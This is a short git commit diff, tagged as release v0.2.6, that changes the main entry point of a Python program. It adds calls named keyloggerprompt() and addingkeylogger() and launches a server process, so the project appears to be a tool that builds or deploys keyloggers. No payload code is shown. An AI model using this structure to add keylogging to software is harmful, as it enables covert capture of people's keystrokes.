v.0.2.6 - RELEASED

This commit is contained in:
AnonUD4Y 2019-04-21 11:50:36 +00:00 committed by GitHub
parent e219ea75e5
commit 86c2c62573

View File

@ -24,12 +24,14 @@ readConfig()
if __name__ == "__main__":
try:
runMainMenu()
mainMenu()
keyloggerprompt()
addingkeylogger()
inputCustom()
##############
runServer()
selectServer()
multiprocessing.Process(target=runServer).start()